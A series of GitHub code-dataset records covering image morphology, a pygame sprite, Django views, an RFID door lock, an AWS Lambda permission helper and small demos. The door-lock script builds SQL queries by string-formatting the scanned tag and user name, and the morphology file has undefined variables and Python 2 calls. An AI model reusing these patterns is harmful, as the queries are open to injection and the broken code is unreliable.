cv2.dilate(im, kernel, iterations=iterations)\n    result = cv2.erode(imdil, kernel, iterations=iterations)\n    return result\n\ndef closeth (im, kernel, iterations=1):\n    #close top-hat: closing minus the original image\n    imdil = cv2.dilate(im,kernel,iterations=iterations)\n    imerod = cv2.erode(imdil,kernel,iterations=iterations)\n    result = imerod - im\n    return result\n\n\ndef openth (im, kernel, iterations=1):\n    #residue between the opening and the original image\n    imerod = cv2.erode(im,kernel,iterations=iterations)\n    imdil = cv2.dilate(imerod,kernel,iterations=iterations)\n    result = imdil - im\n    return result\n\ndef rgb2gray(rgb):\n    r, g, b = rgb[:,:,0], rgb[:,:,1], rgb[:,:,2]\n    gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n    return gray\n\ndef blackhat(im, kernel, iterations=1):\n    #NB: as written this returns the closing itself rather than closing minus the image\n    result = close(im, kernel, iterations)\n    return result\n\ndef smooth(im, diam=3):\n    result = cv2.GaussianBlur(im, (diam, diam), 0)\n    return(result)\n\ndef image_equal(im0, im1):\n    return (sum(sum(im0 != im1)) == 0)\n\n\ndef infrec (im,aux):\n    #NOTE: shadowed by the infrec(f1, f2, n) defined further down\n    kernel = np.ones((13,13), np.uint8)\n    imero = aux\n    c = 0\n    imt0 = imero\n    imt1 = cv2.dilate(imt0, kernel)\n    is_equal = image_equal(imt0, imt1)\n    while (not is_equal.all()):\n        #print(c)\n        imt0 = imt1\n        imdil = cv2.erode(imt0, kernel)\n        imt1 = np.maximum(imdil, im)\n        is_equal = image_equal(imt0, imt1)\n        c = c + 1\n    return imt1\n\n\ndef iaisequal(f1, f2, MSG=None):\n\n    if f1.shape != f2.shape:\n        return False\n    return np.all(f1 == f2)\ndef reconstruct(im):\n    kernel = np.ones((11,11), np.uint8)\n    imero = cv2.erode(im, kernel)\n    c = 0\n    imt0 = imero\n    imt1 = cv2.dilate(imt0, kernel)\n    is_equal = image_equal(imt0, imt1)\n    while (not is_equal.all()):\n        #print(c)\n        imt0 = imt1\n        imdil = cv2.dilate(imt0, kernel)\n        imt1 = np.minimum(imdil, im)\n        is_equal = image_equal(imt0, imt1)\n        c = c + 1\n    return imt1\n\n\ndef infrec(f1,f2,n=1):\n    secross = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n    y = np.minimum(f1,f2)\n\n    for i in range(n):\n        aux = y\n        y1 = cv2.dilate(y,secross) #dilate the current reconstruction, then clamp it by the mask f2\n        y = 
np.minimum(y1,f2)\n if iaisequal(y,aux): break\n\n return y\n\n \n\n\ndef iaisequal(f1, f2, MSG=None):\n\n if f1.shape != f2.shape:\n return False\n return np.all(f1 == f2)\n \n\n\n\n\ndef blob(f, measurement, output=\"image\"):\n #import numpy\n from numpy import newaxis, ravel, zeros, sum, nonzero, array, asanyarray\n from string import lower\n\n measurement = lower(measurement)\n output = lower(output)\n if len(f.shape) == 1: f = f[newaxis,:]\n assert measurement in ('area', 'centroid', 'boundingbox'), 'pymorph.blob: Unknown measurement type \\'%s\\'' % measurement\n if output == 'data':\n y = []\n elif measurement == 'centroid':\n y = zeros(f.shape,numpy.bool)\n else:\n y = zeros(f.shape,numpy.int32)\n for obj_id in range(f.max()):\n blob = (f == (obj_id+1))\n if measurement == 'area':\n area = blob.sum()\n if output == 'data': y.append(area)\n else : y += area*blob\n elif measurement == 'centroid':\n indy, indx = nonzero(blob)\n cy = sum(indy) // len(indy)\n cx = sum(indx) // len(indx)\n if output == 'data': y.append( (cy, cx) )\n else : y[cy, cx] = 1\n elif measurement == 'boundingbox':\n col, = nonzero(blob.any(0))\n row, = nonzero(blob.any(1))\n if output == 'data': y.append([col[0],row[0],col[-1]+1,row[-1]+1])\n else:\n y[row[0]:row[-1], col[0]] = 1\n y[row[0]:row[-1],col[-1]] = 1\n y[row[0], col[0]:col[-1]] = 1\n y[row[-1],col[0]:col[-1]] = 1\n return asanyarray(y)\n\n\ndef label(f, Bc=None):\n if Bc is None: Bc = secross()\n if not isbinary(f):\n f = (f > 0)\n f = pad4n(f, Bc, 0)\n neighbours = se2flatidx(f,Bc)\n labeled = f * 0\n f = f.ravel()\n labeledflat=labeled.ravel()\n label = 1\n queue = []\n for i in range(f.size):\n if f[i] and labeledflat[i] == 0:\n labeledflat[i]=label\n queue=[i+bi for bi in neighbours]\n while queue:\n ni=queue.pop()\n if f[ni] and labeledflat[ni] == 0:\n labeledflat[ni]=label\n for n in neighbours+ni:\n queue.append(n)\n label += 1\n return labeled[1:-1,1:-1]\n\n\n\ndef binary(f, k=1):\n \n from numpy import asanyarray\n f = asanyarray(f)\n return (f >= k)\n\n\ndef union(f1, f2, *args):\n \n from numpy import maximum\n y = maximum(f1,f2)\n for f in args:\n y = maximum(y,f)\n return y.astype(f1.dtype)\n \ndef secross(r=1):\n \n return sesum(binary([[0,1,0],\n [1,1,1],\n [0,1,0]]),\n r)\n\ndef isbinary(f):\n return f.dtype == bool\n\n\ndef threshad(f, f1, f2=None):\n \n if f2 is None:\n return f1 <= f\n return (f1 <= f) & (f <= f2)\n\n\ndef sesum(B=None, N=1):\n \n if B is None: B = secross()\n if N==0:\n if isbinary(B): return binary([[1]])\n else: return to_int32([[0]]) \n NB = B\n for i in range(N-1):\n NB = sedilate(NB,B)\n return NB\n\n\ndef areaopen(f, a, Bc=None):\n if Bc is None: Bc = secross()\n fr = label(f,Bc) \n g = blob(fr,'area')\n y = threshad(g,a)\n \n for k in range(k1,k2+1):\n fk = threshad(f,k)\n fo = areaopen(fk,a,Bc)\n if isequal(fo,zero):\n break\n y = union(y, gray(fo,datatype(f),k))\n return y\n\ndef pad4n(f, Bc, value, scale=1):\n \n from numpy import ones, array\n\n if type(Bc) is not array:\n Bc = seshow(Bc)\n Bh, Bw = Bc.shape\n assert Bh%2 and Bw%2, 'structuring element must be odd sized'\n ch, cw = scale * Bh/2, scale * Bw/2\n g = value * ones( f.shape + scale * (array(Bc.shape) - 1))\n g[ ch: -ch, cw: -cw] = f\n return g.astype(f.dtype)\n\ndef mat2set(A):\n \n from numpy import take, ravel, nonzero, transpose, newaxis\n\n if len(A.shape) == 1: A = A[newaxis,:]\n offsets = nonzero(ravel(A) - limits(A)[0])[0]\n if len(offsets) == 0: return ([],[])\n h,w = A.shape\n x = [0,1]\n x[0] = offsets//w - (h-1)//2\n x[1] = 
offsets%w - (w-1)//2\n x = transpose(x)\n return x,take(ravel(A),offsets)\n\ndef find_area(area, i):\n lista = []\n while area[i] >= 0:\n lista.append(i)\n i = area[i]\n area[lista] = i\n return i\ndef iasecross(r=1):\n from ia870.iasesum import iasesum\n from ia870.iabinary import iabinary\n\n B = iasesum( iabinary([[0,1,0],\n [1,1,1],\n [0,1,0]]),r)\n return B\n\n\ndef iase2off(Bc,option='neigh'):\n \n '''Converts structuring element to list of neighbor offsets in graph image'''\n print(\"TAMANHO BC\",len(Bc.shape))\n if len(Bc.shape) == 2:\n h,w = Bc.shape\n hc,wc = h//2,w//2\n B = Bc.copy()\n B[hc,wc] = 0 # remove origin\n off = np.transpose(B.nonzero()) - np.array([hc,wc])\n if option == 'neigh':\n return off # 2 columns x n. of neighbors rows\n elif option == 'fw':\n i = off[:,0] * w + off[:,1]\n return off[i>0,:] # only neighbors higher than origin in raster order\n elif option == 'bw':\n i = off[:,0] * w + off[:,1]\n return off[i<0,:] # only neighbors less than origin in raster order\n else:\n assert 0,'options are neigh, fw or bw. It was %s'% option\n return None\n elif len(Bc.shape) == 3:\n d,h,w = Bc.shape\n dc,hc,wc = d//2,h//2,w//2\n B = Bc.copy()\n B[dc,hc,wc] = 0 # remove origin\n off = np.transpose(B.nonzero()) - np.array([dc,hc,wc])\n if option == 'neigh':\n return off # 2 columns x n. of neighbors rows\n elif option == 'fw':\n i = off[:,0] * h*w + off[:,1] * w + off[:,2]\n return off[i>0,:] # only neighbors higher than origin in raster order\n elif option == 'bw':\n i = off[:,0] * h*w + off[:,1] * w + off[:,2]\n return off[i<0,:] # only neighbors less than origin in raster order\n else:\n assert 0,'options are neigh, fw or bw. It was %s'% option\n return None\n else:\n print('2d or 3d only. Shape was', len(Bc.shape))\n return None\n\ndef iaNlut(s,offset):\n '''Precompute array of neighbors. Optimized by broadcast.\n s - image shape\n offset - offset matrix, 2 columns (dh,dw) by n. 
of neighbors rows\n '''\n print(\"IANLUT SIZE\",len(s))\n if len(s)== 2:\n H,W = s\n n = H*W\n hi = np.arange(H).reshape(-1,1)\n wi = np.arange(W).reshape(1,-1)\n hoff = offset[:,0]\n woff = offset[:,1]\n h = hi + hoff.reshape(-1,1,1)\n w = wi + woff.reshape(-1,1,1)\n h[(h<0) | (h>=H)] = n\n w[(w<0) | (w>=W)] = n\n Nlut = np.clip(h * W + w,0,n)\n return Nlut.reshape(offset.shape[0],-1).transpose()\n elif len(s)== 3:\n D,H,W = s\n n = D*H*W\n di = np.arange(D).reshape(-1, 1, 1)\n hi = np.arange(H).reshape( 1,-1, 1)\n wi = np.arange(W).reshape( 1, 1,-1)\n doff = offset[:,0]\n hoff = offset[:,1]\n woff = offset[:,2]\n d = di + doff.reshape(-1,1,1,1)\n h = hi + hoff.reshape(-1,1,1,1)\n w = wi + woff.reshape(-1,1,1,1)\n d[(d<0) | (d>=D)] = n\n h[(h<0) | (h>=H)] = n\n w[(w<0) | (w>=W)] = n\n Nlut = np.clip(d * H*W + h * W + w,0,n)\n return Nlut.reshape(offset.shape[0],-1).transpose()\n else:\n print('s must have 2 or 3 dimensions')\n return None\n\n\ndef iaareaopen(f,a,Bc=iasecross()):\n np.set_printoptions(threshold=np.inf)\n a = -a\n #print(a)\n s = f.shape\n print(len(f))\n print(\"Shape =\",s)\n g = np.zeros_like(f).ravel()\n print(\"Zeros=\",g)\n print(\"NUMBER OF ZEROS=\",len(g))\n \n print(\"RAVEL=\",f.ravel())\n print(\"NUMBER OF RAVEL ELEMENTS=\",len(f.ravel()))\n f1 = np.concatenate((f.ravel(),np.array([0])))\n #f1 = np.array(np.zeros(17915904))\n print(\"F1 =\",f1)\n print(\"NUMBER OF F1 ELEMENTS=\",len(f1))\n print(\"Area Img =\",f1.size)\n if np.array_equal(f1[:-1], f.ravel()):\n print(\"F1 MATCHES THE FLATTENED IMAGE\")\n else:\n print(\"NO MATCH\")\n area = -np.ones((f1.size,), np.int32)\n print(\"Area=\",area)\n print(\"AREA SIZE\",len(area))\n N = iaNlut(s, iase2off(Bc))\n print(\"Value N=\",N)\n pontos = f1.nonzero()[0]\n print(\"Points=\",pontos)\n pontos = pontos[np.lexsort((np.arange(0,-len(pontos),-1),f1[pontos]))[::-1]]\n print(\"Points2=\",pontos)\n for p in pontos:\n for v in N[p]:\n if f1[p] < f1[v] or (f1[p] == f1[v] and v < p):\n #print(len(N[p]))\n rv = find_area(area, v)\n if rv != p:\n if area[rv] > a or f1[p] == f1[rv]:\n area[p] = area[p] + area[rv]\n area[rv] = p\n else:\n area[p] = a\n for p in pontos[::-1]:\n if area[p] >= 0:\n g[p] = g[area[p]]\n else:\n if area[p] <= a:\n g[p] = f1[p]\n #print(g.reshape(s))\n return g.reshape(s)\n \ndef find_area(area, i):\n lista = []\n while area[i] >= 0:\n lista.append(i)\n i = area[i]\n area[lista] = i\n return i\n\n\n\nTEST3 = True\n\nif __name__ == \"__main__\":\n filename = \"images/galeao.jpg\"\n f_pil = Image.open('images/img2.png').convert('L') # must be read as grayscale\n #f_pil = Image.open('images/1_good.jpg').convert('L') # must be read as grayscale\n img = my.imread(filename)\n imgray = my.imreadgray(filename)\n recimg = \"images/rec.png\" \n \n\n if (TEST3):\n \n f = np.array(f_pil)\n \n \n disk = cv2.getStructuringElement(2, (51,51))\n image1 = Image.open(\"images/img2.png\").convert(\"1\")\n \n #STEP 1 - OPENTH\n #imopenth = closeth(imgray,disk,1)\n imcloseth = closeth(f,disk)\n \n #my.imshow(imcloseth)\n print(\"CloseTh\")\n #th=ia.iacloseth(f,ia.iasedisk(31))\n\n\n bin1=my.thresh(f,2)\n #my.imshow(bin1)\n #bin1 = ia.iathreshad(imopenth,30)\n \n #my.imshow(bin1)\n #print(\"Threshold \")\n\n\n #rec = reconstruct(bin1)\n #my.imshow(rec)\n #print(\"Reconstruction after closing\")\n\n \n kernel1 = cv2.getStructuringElement(cv2.MORPH_CROSS, (3,3))\n hitmiss = cv2.morphologyEx(bin1, cv2.MORPH_HITMISS, kernel1)\n \n #my.imshow(hitmiss)\n #print(\"Hit-Miss\")\n \n #y = areaopen(hitmiss,4,secross())\n #m=\n m = iaareaopen(bin1,1000,kernel1)\n my.imshow(m)\n 
print(\"RODOU\")\n #m =ia.iaareaopen(hitmiss,1000,ia.iasebox()) \n #my.imshow(m)\n #print(\"AreaOpen\")\n #kernel = np.ones((17,17), np.uint8)\n \n #tophat_img = cv2.morphologyEx(m, cv2.MORPH_BLACKHAT, kernel)\n #my.imshow(tophat_img)\n\n \n \n g = ia.iainfrec(ia.iagray(m),imcloseth)\n #g = infrec(ia.iagray(m),imcloseth)\n #g = imreconstruct (ia.iagray(m), imcloseth) #dilatação condicional\n #my.imshow(g)\n print(\"Infrec\")\n\n\n \n h = my.thresh(g, 4.5)\n #my.imshow(h)\n print(\"Thresh\")\n\n #my.imshow(rec)\n \n \n\n\n","repo_name":"mrobertowagner/VGLGui","sub_path":"files/lotuf.py","file_name":"lotuf.py","file_ext":"py","file_size_in_byte":13239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"15287990346","text":"import pygame\n\nclass Ino(pygame.sprite.Sprite):\n # klass odnogo prishelca\n\n def __init__(self, screen):\n # initializiryem i zadaem nachalnyu poziciu\n super(Ino, self).__init__()\n self.screen = screen\n self.image = pygame.image.load('img/ino.png')\n self.rect = self.image.get_rect()\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n def draw(self):\n # vivod prisheltca na ikran\n self.screen.blit(self.image, self.rect)\n\n def update(self):\n # peremeschaet prishelcev\n self.y += 0.1\n self.rect.y = self.y","repo_name":"Calider/GitTest","sub_path":"ino.py","file_name":"ino.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11123921389","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\n\nfrom django.http import HttpResponse\nfrom .models import Item\nfrom .forms import PostForm,getData\n\ndef add_task(request):\n \"\"\"Adds a new task to the list.\"\"\"\n latest_item_list = Item.objects.order_by('title')\n if request.method == 'GET':\n form = PostForm()\n else:\n form = PostForm(request.POST)\n if form.is_valid():\n title = form.cleaned_data['Task_Description']\n completed = form.cleaned_data['completed']\n post = Item.objects.create(title=title,completed=completed)\n return HttpResponseRedirect('/tasks/')\n\n return render(request, 'tasks/index.html', {'form': form,'latest_item_list': latest_item_list,})\n\ndef update_task(request,item_id):\n \"\"\"Updates an existing task in the list.\"\"\"\n item = get_object_or_404(Item, pk=item_id)\n form = getData(request.POST)\n if request.method == 'POST':\n\n if form.is_valid():\n title = form.cleaned_data['Edit_Task_Description']\n updatetask_desc = Item.objects.get(id=item_id)\n updatetask_desc.title = title\n updatetask_desc.save()\n return HttpResponseRedirect(\".\")\n else:\n form = getData()\n\n return render(request, 'tasks/detail.html', {'item': item,'form': form,})\n\ndef deleteTask(request,item_id):\n \"\"\"Delete a task in the list.\"\"\"\n item = Item.objects.get(pk=item_id)\n item.delete()\n return HttpResponseRedirect('/tasks/')\n\ndef markIt(request,item_id):\n \"\"\"Mark a task in the list as completed.\"\"\"\n item = Item.objects.get(pk=item_id)\n item.completed = True\n item.save()\n return 
HttpResponseRedirect('/tasks/')\n","repo_name":"rajashreemaiya/Task-List-using-Django","sub_path":"TasksApp/tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38461788831","text":"#!/usr/bin/env python3\nimport sys\nimport MySQLdb\nfrom threading import Thread\nimport threading\nimport time\nimport RPi.GPIO as GPIO\nimport json\nfrom random import randint\nfrom evdev import InputDevice\nfrom select import select\nfrom twilio.rest import Client\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(13,GPIO.OUT)\nGPIO.output(13,GPIO.HIGH)\n\n\ntry:\n # python 2\n import Tkinter as tk\n import ttk\nexcept ImportError:\n # python 3\n import tkinter as tk\n from tkinter import ttk\n \nclass Fullscreen_Window:\n \n global dbHost\n global dbName\n global dbUser\n global dbPass\n \n dbHost = 'localhost'\n dbName = 'db_name'\n dbUser = 'pi_userame'\n dbPass = 'pi_pwd'\n \n def __init__(self):\n self.tk = tk.Tk()\n self.tk.title(\"Tag8 Door Lock\")\n self.frame = tk.Frame(self.tk)\n self.frame.grid()\n self.tk.columnconfigure(0, weight=1)\n \n self.tk.attributes('-zoomed', True)\n self.tk.attributes('-fullscreen', True)\n self.state = True\n self.tk.bind(\"\", self.toggle_fullscreen)\n self.tk.bind(\"\", self.end_fullscreen)\n self.tk.config(cursor=\"none\")\n \n self.show_idle()\n \n t = Thread(target=self.listen_rfid)\n t.daemon = True\n t.start()\n \n def show_idle(self):\n self.welcomeLabel = ttk.Label(self.tk, text=\"Please Present\\nYour Token\")\n self.welcomeLabel.config(font='size, 20', justify='center', anchor='center')\n self.welcomeLabel.grid(sticky=tk.W+tk.E, pady=210)\n \n def pin_entry_forget(self):\n self.validUser.grid_forget()\n self.photoLabel.grid_forget()\n self.enterPINlabel.grid_forget()\n count = 0\n while (count < 12):\n self.btn[count].grid_forget()\n count += 1\n \n def returnToIdle_fromPINentry(self):\n self.pin_entry_forget()\n self.show_idle()\n \n def returnToIdle_fromPINentered(self):\n self.PINresultLabel.grid_forget()\n self.show_idle()\n \n def returnToIdle_fromAccessGranted(self):\n GPIO.output(13,GPIO.HIGH)\n self.SMSresultLabel.grid_forget()\n self.show_idle()\n \n def toggle_fullscreen(self, event=None):\n self.state = not self.state # Just toggling the boolean\n self.tk.attributes(\"-fullscreen\", self.state)\n return \"break\"\n\n def end_fullscreen(self, event=None):\n self.state = False\n self.tk.attributes(\"-fullscreen\", False)\n return \"break\"\n \n def listen_rfid(self):\n rfid_presented = \"\"\n\n keys = \"X^1234567890XXXXqwertzuiopXXXXasdfghjklXXXXXyxcvbnmXXXXXXXXXXXXXXXXXXXXXXX\"\n dev = InputDevice('/dev/input/event0')\n rfid_presented = \"\"\n\n while True:\n r,w,x = select([dev], [], [])\n for event in dev.read():\n if event.type==1 and event.value==1:\n if event.code==28:\n \n dbConnection = MySQLdb.connect(host=dbHost, user=dbUser, passwd=dbPass, db=dbName)\n cur = dbConnection.cursor(MySQLdb.cursors.DictCursor)\n cur.execute(\"SELECT * FROM access_list WHERE rfid_code = '%s'\" % (rfid_presented))\n \n if cur.rowcount != 1:\n self.welcomeLabel.config(text=\"ACCESS DENIED\")\n #Log access attempt\n cur.execute(\"INSERT INTO access_log SET rfid_presented_datetime = NOW()\" )\n dbConnection.commit()\n time.sleep(3)\n self.welcomeLabel.grid_forget()\n self.show_idle()\n else:\n user_info = cur.fetchone()\n self.welcomeLabel.grid_forget()\n self.validUser = ttk.Label(self.tk, text=\"Welcome\\n %s!\" % 
(user_info['name']), font='size, 15', justify='center', anchor='center')\n self.validUser.grid(columnspan=3, sticky=tk.W+tk.E)\n GPIO.output(13,GPIO.LOW)\n rfid_presented = \"\"\n uname = user_info['name']\n cur.execute(\"INSERT INTO access_log SET user_name = '%s' , rfid_presented_datetime = NOW()\" % (uname))\n dbConnection.commit()\n dbConnection.close()\n time.sleep(2)\n self.validUser.grid_forget()\n self.show_idle()\n self.doorOpenTimeout = threading.Timer(1, self.returnToIdle_fromAccessGranted)\n self.doorOpenTimeout.start()\n else:\n rfid_presented += keys[ event.code ]\nif __name__ == '__main__':\n w = Fullscreen_Window()\n w.tk.mainloop()\n\n\n","repo_name":"RishabSanghi/Electromagnetic-Door-Lock","sub_path":"lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8457983367","text":"import sys\n\nsys.path.insert(\n 1, \"D:\\\\MyData\\\\JobHunting\\\\portofolioProjects\\\\Bounty_Hunter\\\\bounty_code\\\\\"\n)\nfrom hunter import Hunter\nfrom bounty_core import bounty_calculator\n\n# Test 1\nprint(\"~~~~ Running Test 1 ~~~~\")\nprint(\"\")\n\nasajj = Hunter(pay=200, days=5, name=\"Asajj Ventress\")\nembo = Hunter(pay=300, days=4, name=\"Embo\")\nig = Hunter(pay=100, days=8, name=\"IG-88\")\nbossk = Hunter(pay=500, days=9, name=\"Bossk\")\nzam = Hunter(pay=250, days=10, name=\"Zam Wesell\")\n\n_BOUNTY_HUNTERS = [asajj, embo, ig, bossk, zam]\n\nresult = bounty_calculator(1000, 8, _BOUNTY_HUNTERS)\n\nprint(f\"Test 1: Maximum profit is {result}\")\nprint(\"\")\n\n# Test 2 - Should return error\nprint(\"~~~ Running Test 2 ~~~~~~\")\nprint(\"\")\n\nasajj = Hunter(pay=1200, days=5, name=\"Asajj Ventress\")\nembo = Hunter(pay=2300, days=4, name=\"Embo\")\nig = Hunter(pay=3100, days=8, name=\"IG-88\")\nbossk = Hunter(pay=500, days=9, name=\"Bossk\")\nzam = Hunter(pay=1250, days=10, name=\"Zam Wesell\")\n\n_BOUNTY_HUNTERS = [asajj, embo, ig, bossk, zam]\n\nresult = bounty_calculator(200, 10, _BOUNTY_HUNTERS)\n\nprint(f\"Test 2: Maximum profit is {result}\")\n","repo_name":"nicolenlama/Bounty_Hunter","sub_path":"tests/test_advanced.py","file_name":"test_advanced.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38718121621","text":"import datetime\n\n\nSITE_CREDENTIALS = {\n 'site1': {\n 'type': 'Rosneft',\n 'login': '',\n 'password': '',\n 'url': ''\n }\n}\n\nORGANIZATION_CREDENTIALS = {\n 'organization1': {\n 'inn': '123456789012',\n 'kpp': '123456789',\n 'name': 'Организазация 1',\n 'name_full': 'Организазация 1 ООО'\n }\n}\n\nCONTRACTS_CREDENTIALS = {\n 'contract1': {\n 'id_external': '123456789',\n 'type': 'processing',\n 'number': '123456789',\n 'date': datetime.datetime.strptime('01/01/10', '%d/%m/%y')\n }\n}\n","repo_name":"riazmey/kubis_fuel","sub_path":"src/maintenance/credentials_example.py","file_name":"credentials_example.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18449485344","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mdtraj as md\n\nimport simulation.calc.observables as observables\n\nif __name__ == \"__main__\":\n n_bins = 40\n\n Q0 = [ x.rstrip(\"\\n\") for x in open(\"umbrella_last\", \"r\").readlines() ] \n\n plt.figure()\n for i in range(len(Q0)):\n\n # calculate pmf for umbrella\n 
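# each umbrella window has its own directory holding traj.xtc and an umbrella_params file\n 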
os.chdir(Q0[i])\n\n if not os.path.exists(\"qtanh.npy\"):\n traj = md.load(\"traj.xtc\", top=\"conf.gro\")\n qtanh = md.compute_distances(traj, np.array([[0,57]]))\n with open(\"umbrella_params\", \"r\") as fin:\n params = fin.readline().split()\n q0 = float(params[0])\n kumb = float(params[1])\n gamma = float(params[2])\n n_frames_toss = int(params[4])/1000\n\n pairs = np.loadtxt(\"umbrella_params\", usecols=(0,1), dtype=int, skiprows=1) - 1\n r0 = np.loadtxt(\"umbrella_params\", usecols=(2,), skiprows=1)\n\n widths = (2./gamma)*np.ones(len(pairs))\n\n qtanhsum_obs = observables.TanhContactSum(\"conf.gro\", pairs, 1.2*r0, widths)\n qtanh = observables.calculate_observable([\"traj.xtc\"], qtanhsum_obs)\n\n np.save(\"qtanh.npy\", qtanh)\n else:\n qtanh = np.load(\"qtanh.npy\")\n \n n, bins = np.histogram(qtanh, bins=n_bins)\n mid_bin = 0.5*(bins[1:] + bins[:-1])\n pmf = -np.log(n)\n pmf -= pmf.min()\n\n plt.plot(mid_bin, pmf, label=\"$Q_0 = {}$\".format(Q0[i]))\n \n os.chdir(\"..\")\n\n plt.xlim(0, 150)\n plt.ylim(0, 6)\n plt.legend()\n plt.xlabel(\"End-End distance $Q_{tanh}$\")\n plt.ylabel(\"Free Energy (k$_B$T)\")\n plt.savefig(\"Fvsqtanh.pdf\", bbox_inches=\"tight\")\n plt.savefig(\"Fvsqtanh.png\", bbox_inches=\"tight\")\n plt.show()\n\n","repo_name":"ajkluber/simulation","sub_path":"gromacs/examples/q_sampling/plot_qtanh.py","file_name":"plot_qtanh.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40181702195","text":"from cyclomps.tools.utils import *\nfrom cyclomps.algs.dmrg1 import dmrg\nfrom numpy import complex_\nfrom cyclomps.mpo.asep import return_mpo\nimport cProfile\nimport pstats\n\n# System Size\nN = 10\n\n# Hamiltonian Parameters\nalpha = 0.5\ngamma = 0.5\np = 0.1\nq = 1.-p\nbeta = 0.5\ndelta = 0.5\ns = 1.\n\n# Maximum bond dimension\nmbd = [10,100]\n\n# Specify number of processors\nn = 28\n\n# Calculation Settings\nalg = 'davidson'\ntol = 1e-5\nmax_iter = 1\nmin_iter = 1\nmps_dir = 'asep_mps'\nenv_dir = 'asep_env'\nnStates = 1\nfixed_bd = True\nstate_avg = False\northonormalize = False\nend_gauge = 0\nleft = False\n\n# Set up mpo\nmpo = return_mpo(10,(alpha,gamma,p,q,beta,delta,s))\n\n# Run DMRG\nE0 = dmrg(mpo,\n alg=alg,\n dtype=complex_,\n mbd = mbd,\n tol=tol,\n max_iter=max_iter,\n min_iter=min_iter,\n mps_subdir=mps_dir,\n env_subdir=env_dir,\n nStates=nStates,\n fixed_bd=fixed_bd,\n state_avg=state_avg,\n orthonormalize=orthonormalize,\n end_gauge=end_gauge,\n left=left)\n","repo_name":"philliphelms/cyclomps","sub_path":"cyclomps/scripts/asep/increase_mbd.py","file_name":"increase_mbd.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8994433997","text":"import cfnresponse\nimport boto3, json, logging, random\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nlambdaclient = boto3.client('lambda')\n\nRequiredProperties = ['AccountId', 'FunctionName']\ndef handler(event, context):\n params = event['ResourceProperties']\n try:\n for rp in RequiredProperties:\n if rp not in params:\n raise ValueError(\n \"Required event property {0} does not exist\".format(rp))\n except ValueError as p:\n cfnresponse.send(event, context, cfnresponse.FAILED, responseData={'Data': repr(p)})\n raise\n logger.info(event)\n if event['RequestType'] == 'Create':\n logger.info(\"Create Request Recieved\")\n logger.info(\"Generating Random String for permission SID\")\n 
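# build a 9-character random suffix so repeated cross-account grants get unique StatementIds\n 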
randomstring = ''.join([random.choice('abcdefghijklmnopqrstuvwxyz0123456789') for n in range(9)])\n logger.info(\"Random SID = \" + randomstring)\n\n try:\n logger.info(\"Adding Permission to function\")\n response = lambdaclient.add_permission(\n Action='lambda:InvokeFunction',\n FunctionName=params['FunctionName'],\n StatementId='xacct{}-{}'.format(params['AccountId'],randomstring),\n Principal=params['AccountId'])\n logger.info(response)\n cfnresponse.send(event, context, cfnresponse.SUCCESS, {'Data': \"Success!\"})\n except:\n logger.info('exception encountered.')\n cfnresponse.send(event, context, cfnresponse.FAILED, {'Data': \"Failed!\"}, \"Couldn't add trusted entity.\")\n raise\n else:\n logger.info('Nothing to update or delete. ' + event['RequestType'])\n cfnresponse.send(event, context, cfnresponse.SUCCESS, {'Data': \"Success!\"})","repo_name":"ranjeethap/networkprovisioner","sub_path":"src/lambda/addpermissions.py","file_name":"addpermissions.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74011494332","text":"def solution(n):\n ''' \n Write a function called solution(n) which takes a positive integer as a string and \n returns the minimum number of operations needed to transform the number of pellets to 1. \n \n Args: \n n (str): string of positive integer\n Returns:\n res (int): minimum number of operations needed to transform the number of pellets to 1\n\n Examples:\n solution(4) returns 2: 4 -> 2 -> 1\n solution(15) returns 5: 15 -> 16 -> 8 -> 4 -> 2 -> 1\n '''\n n = int(n)\n res = 0\n\n while(n!=1):\n if(n%2==0):\n n=n//2 # integer division keeps n an int for the bitwise checks below\n elif((n==3) or ((n+1)&n) > ((n-1)&(n-2))):\n n-=1\n else:\n n+=1\n res+=1\n return res\n","repo_name":"milkiaszerai/google_foobar_challenges","sub_path":"challenges/level_3_fuel-injection-perfection/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15907857671","text":"from flask import Flask\n\napp = Flask(__name__)\nprint(app.config)\n#Modify the config file contents here; settings added this way keep piling up, so they are usually decoupled into a separate settings file that app3.py loads\napp.config['ENV'] = 'production'\napp.config['DEBUG'] = True\n\n\n\n@app.route('/')\ndef index():\n return 'Welcome, everyone!····'\n\n\nif __name__ == '__main__':\n app.run(port=8000)\n\n # # print(app.config)\n # # pull the configuration items from the settings file and use them\n # 